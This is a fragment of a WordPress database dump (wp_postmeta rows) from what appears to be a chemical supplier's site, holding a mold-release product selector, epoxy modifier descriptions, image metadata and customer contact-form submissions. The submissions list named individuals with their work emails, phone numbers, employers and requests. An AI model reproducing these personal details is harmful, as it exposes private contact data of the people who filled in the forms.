INSERT INTO `wp_postmeta` VALUES (25673, 2909, 'dtree_blob', '{\\"data\\":{\\"1\\":{\\"question\\":\\"What type of material are you molding?\\",\\"type\\":\\"question\\",\\"subtext\\":\\"\\",\\"textlink\\":\\"\\",\\"info\\":\\"\\",\\"choices\\":[{\\"choice\\":\\"Composites or Fiber-Reinforced Fiberglass\\",\\"next\\":\\"20\\"},{\\"choice\\":\\"Rubber / Elastomers\\",\\"next\\":\\"23\\"},{\\"choice\\":\\" Encapsulation / Potting Resins\\",\\"next\\":\\"5\\"},{\\"choice\\":\\"Polyurethane (TPU)\\",\\"next\\":\\"14\\"},{\\"choice\\":\\" Silicone or Fluorosilicone\\",\\"next\\":\\"29\\"},{\\"choice\\":\\"Rotational Molding\\",\\"next\\":\\"26\\"},{\\"choice\\":\\"Thermosetting Plastics\\",\\"next\\":\\"44\\"},{\\"choice\\":\\"High Temperature Materials (>650 F)\\",\\"next\\":\\"44\\"},{\\"choice\\":\\"I am molding Concrete\\",\\"next\\":\\"35\\"}]},\\"5\\":{\\"question\\":\\"Are you Molding Epoxies with Heat?\\",\\"type\\":\\"question\\",\\"subtext\\":\\"\\",\\"textlink\\":\\"\\",\\"info\\":\\"\\",\\"choices\\":[{\\"choice\\":\\"Yes\\",\\"next\\":\\"35\\"},{\\"choice\\":\\"No\\",\\"next\\":\\"14\\"}]},\\"14\\":{\\"question\\":\\"Click here to check out are ReleaSys line of Solvent based Semi-Permanent Release Agents\\",\\"type\\":\\"answer\\",\\"subtext\\":\\"\\",\\"textlink\\":\\"https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/\\",\\"info\\":\\"\\",\\"choices\\":[]},\\"17\\":{\\"question\\":\\"Click here to checkout our PTFE Release Agents\\",\\"type\\":\\"answer\\",\\"subtext\\":\\"\\",\\"textlink\\":\\"https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/\\",\\"info\\":\\"\\",\\"choices\\":[]},\\"20\\":{\\"question\\":\\"Are you Molding Composities with Heat?\\",\\"type\\":\\"question\\",\\"subtext\\":\\"\\",\\"textlink\\":\\"\\",\\"info\\":\\"\\",\\"choices\\":[{\\"choice\\":\\"Yes\\",\\"next\\":\\"44\\"},{\\"choice\\":\\"No\\",\\"next\\":\\"47\\"}]},\\"23\\":{\\"question\\":\\"Are you Molding Metals with Heat?\\",\\"type\\":\\"question\\",\\"subtext\\":\\"\\",\\"textlink\\":\\"\\",\\"info\\":\\"\\",\\"choices\\":[{\\"choice\\":\\"Yes\\",\\"next\\":\\"35\\"},{\\"choice\\":\\"No\\",\\"next\\":\\"14\\"}]},\\"26\\":{\\"question\\":\\"Are you Molding Plaster with Heat?\\",\\"type\\":\\"question\\",\\"subtext\\":\\"\\",\\"textlink\\":\\"\\",\\"info\\":\\"\\",\\"choices\\":[{\\"choice\\":\\"Yes\\",\\"next\\":\\"17\\"},{\\"choice\\":\\"No\\",\\"next\\":\\"17\\"}]},\\"29\\":{\\"question\\":\\"Are you Molding Silicone with Heat?\\",\\"type\\":\\"question\\",\\"subtext\\":\\"\\",\\"textlink\\":\\"\\",\\"info\\":\\"\\",\\"choices\\":[{\\"choice\\":\\"Yes\\",\\"next\\":\\"17\\"},{\\"choice\\":\\"No\\",\\"next\\":\\"17\\"}]},\\"35\\":{\\"question\\":\\"Click Here to check out our ReleaSys line of Water based release Agents\\",\\"type\\":\\"answer\\",\\"subtext\\":\\"\\",\\"textlink\\":\\"https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/\\",\\"info\\":\\"\\",\\"choices\\":[]},\\"44\\":{\\"question\\":\\"ReleaSys 9900\\",\\"type\\":\\"answer\\",\\"subtext\\":\\"ReleaSys 9900: Water-based formulation, binds tenaciously to mold surface offer exceptional durability and ease of release \\",\\"textlink\\":\\"https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/\\",\\"info\\":\\"Miller-Stephenson\\\'s high performance water-based formulation, binds tenaciously to mold surface offer exceptional durability and ease of release \\",\\"choices\\":[]},\\"47\\":{\\"question\\":\\"ReleaSys 9800\\",\\"type\\":\\"answer\\",\\"subtext\\":\\"ReleaSys 9800: Water-based- Rapid Cure at Room Temperature - No Transfer\\",\\"textlink\\":\\"https://www.miller-stephenson.com/product/mold-release-coating/\\",\\"info\\":\\"ReleaSys™ 9800 is a high-performance, high cross-linking water-based, semi-permanent mold release system. This formulation forms our most robust and durable coating, offering unmatched adhesion to all molding surfaces. \\",\\"choices\\":[]}},\\"index\\":{\\"0\\":\\"1\\",\\"1\\":\\"5\\",\\"2\\":\\"14\\",\\"3\\":\\"17\\",\\"4\\":\\"20\\",\\"5\\":\\"23\\",\\"6\\":\\"26\\",\\"7\\":\\"29\\",\\"8\\":\\"35\\",\\"9\\":\\"44\\",\\"10\\":\\"47\\"},\\"start_ID\\":\\"1\\",\\"version\\":\\"1.1.0\\"}'); 
INSERT INTO `wp_postmeta` VALUES (25675, 2912, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25676, 2912, '_seq_num', '100'); 
INSERT INTO `wp_postmeta` VALUES (25677, 2912, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25678, 2912, '_field_1', 'Christoph Begemann'); 
INSERT INTO `wp_postmeta` VALUES (25679, 2912, '_field_10', 'Lufthansa Technik AG'); 
INSERT INTO `wp_postmeta` VALUES (25680, 2912, '_field_2', 'christoph.begemann@lht.dlh.de'); 
INSERT INTO `wp_postmeta` VALUES (25681, 2912, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (25682, 2912, '_field_3', 'Dear All, please send me the data sheets (TDS, MSDS) for the MS-122SEL .\nRgrds, Christoph Begemann'); 
INSERT INTO `wp_postmeta` VALUES (25683, 2912, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25684, 2912, '_sub_id', '2912'); 
INSERT INTO `wp_postmeta` VALUES (25691, 2912, '_edit_lock', '1478532961:2'); 
INSERT INTO `wp_postmeta` VALUES (25703, 2924, '_wp_attached_file', '2016/10/ReleaSys-Troubleshooting-Guide.jpg'); 
INSERT INTO `wp_postmeta` VALUES (25704, 2924, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:830;s:6:"height";i:872;s:4:"file";s:42:"2016/10/ReleaSys-Troubleshooting-Guide.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:42:"ReleaSys-Troubleshooting-Guide-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:42:"ReleaSys-Troubleshooting-Guide-761x800.jpg";s:5:"width";i:761;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:42:"ReleaSys-Troubleshooting-Guide-768x807.jpg";s:5:"width";i:768;s:6:"height";i:807;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:42:"ReleaSys-Troubleshooting-Guide-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:42:"ReleaSys-Troubleshooting-Guide-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:42:"ReleaSys-Troubleshooting-Guide-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:42:"ReleaSys-Troubleshooting-Guide-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"9";s:8:"quantity";d:63;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (25705, 2925, '_wp_attached_file', '2016/10/Untitled-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (25708, 2927, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25709, 2927, '_seq_num', '106'); 
INSERT INTO `wp_postmeta` VALUES (25710, 2927, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25711, 2927, '_field_12', 'Tom Stage'); 
INSERT INTO `wp_postmeta` VALUES (25712, 2927, '_field_13', 'Ardiem Medical'); 
INSERT INTO `wp_postmeta` VALUES (25713, 2927, '_field_18', '149'); 
INSERT INTO `wp_postmeta` VALUES (25714, 2927, '_field_14', 'tstage@ardiemmedical.com'); 
INSERT INTO `wp_postmeta` VALUES (25715, 2927, '_field_15', '(724) 349-0855'); 
INSERT INTO `wp_postmeta` VALUES (25716, 2927, '_field_16', 'I would like to request an electronic copy of an MSDS for your Vertrel XSi.  Thank you for your time and assistance in the matter.\r\n\r\nMost sincerely,\r\n\r\nTom Stage'); 
INSERT INTO `wp_postmeta` VALUES (25717, 2927, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25718, 2927, '_sub_id', '2927'); 
INSERT INTO `wp_postmeta` VALUES (25720, 2927, '_edit_lock', '1478541250:1'); 
INSERT INTO `wp_postmeta` VALUES (25721, 2928, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25722, 2928, '_seq_num', '107'); 
INSERT INTO `wp_postmeta` VALUES (25723, 2928, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25724, 2928, '_field_12', 'Simon Ricks'); 
INSERT INTO `wp_postmeta` VALUES (25725, 2928, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (25726, 2928, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25727, 2928, '_field_14', 'simon.ricks@avcorp.com'); 
INSERT INTO `wp_postmeta` VALUES (25728, 2928, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (25729, 2928, '_field_16', 'Need SDS for MS-122V.\n\nThanks'); 
INSERT INTO `wp_postmeta` VALUES (25730, 2928, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25731, 2928, '_sub_id', '2928'); 
INSERT INTO `wp_postmeta` VALUES (25732, 2929, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25733, 2929, '_seq_num', '101'); 
INSERT INTO `wp_postmeta` VALUES (25734, 2929, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25735, 2929, '_field_1', 'Mark Matchett'); 
INSERT INTO `wp_postmeta` VALUES (25736, 2929, '_field_10', 'AirBorn Electronics Inc.'); 
INSERT INTO `wp_postmeta` VALUES (25737, 2929, '_field_2', 'matchettm@airborn.com'); 
INSERT INTO `wp_postmeta` VALUES (25738, 2929, '_field_8', '(330) 245-2630'); 
INSERT INTO `wp_postmeta` VALUES (25739, 2929, '_field_3', 'Our customer want to seal the perimeter of a few connectors to the PCB before conformal coating. I am looking for a material that would come in a 10cc or 30cc tube and nozzle tip to use in a dispenser.'); 
INSERT INTO `wp_postmeta` VALUES (25740, 2929, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25741, 2929, '_sub_id', '2929'); 
INSERT INTO `wp_postmeta` VALUES (25742, 1910, '_wp_attachment_image_alt', 'HELOXY 61 Epoxy Resin Modifier'); 
INSERT INTO `wp_postmeta` VALUES (25743, 1069, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (25744, 1069, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (25745, 1069, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (25746, 1069, '_yoast_wpseo_focuskw_text_input', 'HELOXY 61'); 
INSERT INTO `wp_postmeta` VALUES (25747, 1069, '_yoast_wpseo_focuskw', 'HELOXY 61'); 
INSERT INTO `wp_postmeta` VALUES (25748, 1069, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (25749, 1069, '_yoast_wpseo_focuskeywords', '[{"keyword":" Epoxy Resin Modifier","score":"ok"},{"keyword":"Epoxy Functional Modifier","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (25750, 1227, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (25751, 1227, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (25752, 1227, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (25753, 1227, '_yoast_wpseo_focuskw_text_input', 'HELOXY 107'); 
INSERT INTO `wp_postmeta` VALUES (25754, 1227, '_yoast_wpseo_focuskw', 'HELOXY 107'); 
INSERT INTO `wp_postmeta` VALUES (25755, 1227, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (25756, 1227, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (25757, 1915, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (25758, 1227, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25759, 1227, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25760, 1227, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (25761, 1227, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (25762, 1227, '_ywtm_content_tab_description', '<strong>Product Description</strong>\r\n\r\nHELOXY 107 is the diglycidyl ether of cyclohexane dimethanol. While it is primarily used as a reactive diluent or viscosity reducing modifier for epoxy resin formulations, it also can effectively serve as a reactive intermediate for further synthesis of various cycloaliphatic based resins.\r\n\r\n<strong>Application Areas/Suggested Uses</strong>\r\n<ul>\r\n 	<li>\r\n<div class="Section1">To improve air release and wetting characteristics or to increase pot life in electrical, potting, encapsulation, and impregnation applications</div></li>\r\n 	<li>\r\n<div class="Section1">To maintain high reactivity yet provide workable viscosity at room temperature when using novolac or other high functionality epoxy resins</div></li>\r\n</ul>\r\n<strong>Benefits</strong>\r\n<ul>\r\n 	<li>Reduces viscosity of epoxy formulations while maintaining most cured state properties</li>\r\n 	<li>Provides excellent cured state resistance to creep or deformation under high stress</li>\r\n 	<li>Is an effective means of incorporating a cycloaliphatic structure into the polymer chain</li>\r\n</ul>\r\n<strong>General Information</strong>\r\n\r\nHELOXY Modifier 107 is fully compatible with the entire bisphenol <span class="GramE">A</span> based series of epoxy resins as well as higher functionality epoxy resins. Concentrations of up to 40 percent of HELOXY Modifier 107 have been employed for viscosity reduction. Performance properties of systems containing this resin are maintained at higher modifier concentrations than is possible with monoepoxide diluents and most diepoxide diluents.\r\n\r\nEffect of HELOXY Modifier 107 modifications on the properties of various EPON™ Resin 828 based systems is demonstrated by data presented in Table 1. Substituting HELOXY Modifier 107 for Epon Resin 828 or other unmodified resins generally results in slight increases in flexibility. As with all diluting modifiers, use of HELOXY Modifier 107 decreases chemical resistance and elevated temperature performance. To minimize such losses, the lowest concentration of HELOXY Modifier 107 necessary to obtain desired reduction in viscosity should be used.\r\n\r\nWhen formulating with HELOXY Modifier 107, the concentration of curing agent to be used will likely be different than in the case of an unmodified system. The proper curing agent combining ratio should always be calculated in order to ensure proper stoichiometric balance.'); 
INSERT INTO `wp_postmeta` VALUES (25763, 1227, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (25764, 1914, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (25765, 1230, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (25766, 1230, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (25767, 1230, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (25768, 1230, '_yoast_wpseo_focuskw_text_input', 'HELOXY 71'); 
INSERT INTO `wp_postmeta` VALUES (25769, 1230, '_yoast_wpseo_focuskw', 'HELOXY 71'); 
INSERT INTO `wp_postmeta` VALUES (25770, 1230, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (25771, 1230, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (25772, 1230, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25773, 1230, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (25774, 1230, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (25775, 1230, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (25776, 1230, '_ywtm_content_tab_description', '<strong>Product Description-</strong> HELOXY 71 is an undiluted amber colored, low-viscosity liquid, aliphatic epoxy ester resin that imparts increased flexibility and resistance to thermal shock when blended with conventional liquid bisphenol A based epoxy resins.\r\n\r\n<span style="text-decoration: underline;">Application Areas/Suggested Uses </span>\r\n<ul>\r\n 	<li>Body solders</li>\r\n 	<li>Adhesives</li>\r\n 	<li>Caulking and sealing compounds</li>\r\n 	<li>Electrical casting and encapsulating</li>\r\n 	<li>Glass to metal glazing compositions</li>\r\n 	<li>Large castings</li>\r\n 	<li>Tooling compositions</li>\r\n 	<li>Filament winding</li>\r\n</ul>\r\n<strong>Benefits </strong>\r\n<ul>\r\n 	<li>A low-viscosity flexibilizer that serves as a viscosity depressing agent.</li>\r\n 	<li>A product that improves impact strength and toughness to a conventional liquid bisphenol A epoxy resin.</li>\r\n</ul>\r\n<strong>Curing Agents </strong>\r\n\r\nBlends of HELOXY 71 and EPON™ Resin 828 can be cured with all curing agents except the polyamine adducts (i.e., EPIKURE™ Curing Agent 3282), which produce incompatible cured products. Depending upon the ratio of resin blend and the hardener used, the elongation at break can range as high as 200-300%, although 50-100% is more common. The use of HELOXY 71 as the sole resin in a formulation is not recommended. As in the case of most common flexibilizers, high concentrations of HELOXY Modifier 71 tend to decrease the superior chemical resistance of unmodified epoxy resin systems. Also, experience has shown that optimum tensile properties are normally reached with elevated temperature cures because there is a tendency for room temperature amine cured systems to age harden. Results obtained with various curing agent systems reported in the following sections are intended as a guide when selecting an EPON Resin 828/HELOXY Modifier 71/ EPIKURE Curing Agent system for your specific application.\r\n\r\n<strong>Cure with Aliphatic Amine Curing Agents</strong>\r\n\r\nBlends of HELOXY 71 and EPON Resin 828 cured with aliphatic amines yield a wide range of flexible to semi-rigid polymers. The final properties of these polymers are affected by the type of amine curing agent and the ratio of HELOXY Modifier 71 to EPON Resin 828. Although most of the data presented in this technical bulletin is based on systems cured at elevated temperatures, data is included which show that EPI-CURE Curing Agents 3223 and 3200 are effective room temperature curing agents.\r\n\r\n<strong>Cure with an Aromatic Diamine</strong>\r\n\r\nHELOXY Modifier 71 and EPON Resin 828 cured with ANCAMINE® Z (4,4\'- Methylenedianiline), an aromatic diamine, are summarized. You will note a wide range of tensile properties can be achieved depending on the ratio of EPON Resin 828 and HELOXY Modifier 71.\r\n\r\n<strong>Cure with Acid Anhydrides</strong>\r\n\r\nAs with amine curing agents, acid anhydrides can be used with HELOXY Modifier 71 or blends of this resin with EPON Resin 828 to produce tough, flexible polymers. Curing agent accelerators or catalysts, such as EPIKURE Curing Agent 3253 or benzyl dimethylamine (Aceto Corporation), are used to reduce the required HELOXY Modifier 71 HCD-2638 (Rev. 11/7/2016 3:28:44 PM) Page 2 of 7 cure time and cure temperature. Table 5 displays data on HELOXY Modifier 71 cured with two popular acid anhydrides. Table 6 displays tensile properties of several blends of HELOXY 71 and EPON Resin 828 cured with NADIC Methyl Anhydride. Again, you will note that adjusting the flexibilizer level in the EPON Resin 828 allows broad latitude in formulating a system with the desired tensile strength and elongation properties\r\n\r\n<strong>Cure with Lewis Acids or Accelerators</strong>\r\n\r\n75/25 by weight blend of HELOXY Modifier 71/ EPON Resin 828, cured with various levels of boron trifluoride monoethylamine. In this study, four parts of boron trifluoride monoethylamine appears to be the optimal level of Lewis acid. Another study was undertaken to determine the effect of phenolic accelerators on the properties of HELOXY Modifier 71 systems. Our laboratory determined that a formulator could add up to 5 parts of phenol per 100 parts of HELOXY 71 with no effect on tensile elongation. Higher levels of phenol decrease tensile strength and exhibit a deleterious effect on chemical resistance.'); 
INSERT INTO `wp_postmeta` VALUES (25777, 1230, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (25778, 163, '_oembed_f87af8bbd8a1657e86577b110795d4ad', '{{unknown}}'); 
INSERT INTO `wp_postmeta` VALUES (25779, 2929, '_edit_lock', '1478603604:1'); 
INSERT INTO `wp_postmeta` VALUES (25780, 2928, '_edit_lock', '1478605032:1'); 
INSERT INTO `wp_postmeta` VALUES (25781, 2933, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25782, 2933, '_seq_num', '108'); 
INSERT INTO `wp_postmeta` VALUES (25783, 2933, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25784, 2933, '_field_12', 'Dung Lam'); 
INSERT INTO `wp_postmeta` VALUES (25785, 2933, '_field_13', 'Precipart Corporation'); 
INSERT INTO `wp_postmeta` VALUES (25786, 2933, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25787, 2933, '_field_14', 'Dlam@precipart.com'); 
INSERT INTO `wp_postmeta` VALUES (25788, 2933, '_field_15', '(631) 694-3100'); 
INSERT INTO `wp_postmeta` VALUES (25789, 2933, '_field_16', 'Hi,\r\n\r\nOur purchasing department was trying to order the hardener (Polymide Resin) Versamid 125 for use with Epon 828 but was advised that it is no longer available.  Please advise the equivalent replacement for Versamid 125.  Thanks.\r\n\r\nRegards,\r\n\r\nDung Lam'); 
INSERT INTO `wp_postmeta` VALUES (25790, 2933, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25791, 2933, '_sub_id', '2933'); 
INSERT INTO `wp_postmeta` VALUES (25792, 2934, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25793, 2934, '_seq_num', '109'); 
INSERT INTO `wp_postmeta` VALUES (25794, 2934, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25795, 2934, '_field_12', 'Ann Romano'); 
INSERT INTO `wp_postmeta` VALUES (25796, 2934, '_field_13', 'Accutron, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (25797, 2934, '_field_18', 'Zodiac Executive Aircraft'); 
INSERT INTO `wp_postmeta` VALUES (25798, 2934, '_field_14', 'aromano@accutroninc.com'); 
INSERT INTO `wp_postmeta` VALUES (25799, 2934, '_field_15', '(860) 683-8300'); 
INSERT INTO `wp_postmeta` VALUES (25800, 2934, '_field_16', 'Good Morning,\r\nAccutron is a CM and Zodiac is one of our customers.  Their BOM calls out a conformal coating # DPMSD0522A which I&#039;m not finding on your website.  Can you get me some information on this material?\r\n\r\nThank You,\r\nAnn'); 
INSERT INTO `wp_postmeta` VALUES (25801, 2934, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25802, 2934, '_sub_id', '2934'); 
INSERT INTO `wp_postmeta` VALUES (25803, 2935, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25804, 2935, '_seq_num', '102'); 
INSERT INTO `wp_postmeta` VALUES (25805, 2935, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25806, 2935, '_field_1', 'Troy Jackson'); 
INSERT INTO `wp_postmeta` VALUES (25807, 2935, '_field_10', 'Raytheon'); 
INSERT INTO `wp_postmeta` VALUES (25808, 2935, '_field_2', 'Troy.a.jackson@raytheon.com'); 
INSERT INTO `wp_postmeta` VALUES (25809, 2935, '_field_8', '(757) 421-8361'); 
INSERT INTO `wp_postmeta` VALUES (25810, 2935, '_field_3', 'Good afternoon. I am currently in the process of updating SDS records, and I am  inquiring about a connector lubricant with a product number of MS-383H. I would greatly appreciate if the most currently revised SDS for this product could be emailed to me at your earliest convenience.  Thank you in advance.'); 
INSERT INTO `wp_postmeta` VALUES (25811, 2935, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (25812, 2935, '_sub_id', '2935'); 
INSERT INTO `wp_postmeta` VALUES (25813, 2936, '_edit_lock', '1496148752:3'); 
INSERT INTO `wp_postmeta` VALUES (25814, 2936, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (25815, 2937, '_wp_attached_file', '2016/11/shutterstock_358447820-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (25816, 2937, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:36:"2016/11/shutterstock_358447820-1.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"shutterstock_358447820-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"shutterstock_358447820-1-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"shutterstock_358447820-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"shutterstock_358447820-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"shutterstock_358447820-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"shutterstock_358447820-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"shutterstock_358447820-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (25817, 2936, '_thumbnail_id', '2937'); 
INSERT INTO `wp_postmeta` VALUES (25818, 2936, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (25819, 2936, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (25820, 2936, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (25821, 2936, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (25822, 2936, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (25823, 2936, '_yoast_wpseo_primary_category', '216'); 
INSERT INTO `wp_postmeta` VALUES (25827, 2943, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (25828, 2943, '_seq_num', '110'); 
INSERT INTO `wp_postmeta` VALUES (25829, 2943, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25830, 2943, '_field_12', 'Michael Nerino'); 
INSERT INTO `wp_postmeta` VALUES (25831, 2943, '_field_13', 'Northrop Grumman'); 
INSERT INTO `wp_postmeta` VALUES (25832, 2943, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (25833, 2943, '_field_14', 'Michael.Nerino@ngc.com'); 
INSERT INTO `wp_postmeta` VALUES (25834, 2943, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (25835, 2943, '_field_16', 'Require the most current SDS for MS-122AD Aerosol.'); 
INSERT INTO `wp_postmeta` VALUES (25836, 2943, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (25837, 2943, '_sub_id', '2943'); 
INSERT INTO `wp_postmeta` VALUES (25838, 2937, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (25840, 2936, '_yoast_wpseo_focuskw_text_input', 'Composite Mold Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (25841, 2936, '_yoast_wpseo_focuskw', 'Composite Mold Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (25842, 2936, '_yoast_wpseo_title', 'Composite Mold Release Agents | Aerospace Composite Mold Release |'); 
INSERT INTO `wp_postmeta` VALUES (25843, 2936, '_yoast_wpseo_metadesc', 'Miller-Stephenson composite mold release agents offer unmatched durability, cost-effectiveness and efficiency. Semi-permanent and PTFE release agents.'); 
INSERT INTO `wp_postmeta` VALUES (25844, 2936, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (25848, 2936, '_wp_old_slug', 'composite-mold-release-agents-miller-stephenson'); 
INSERT INTO `wp_postmeta` VALUES (25850, 2936, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (25866, 2956, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (25867, 2956, '_seq_num', '103'); 
INSERT INTO `wp_postmeta` VALUES (25868, 2956, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (25869, 2956, '_field_1', 'Larry Muehleisen'); 
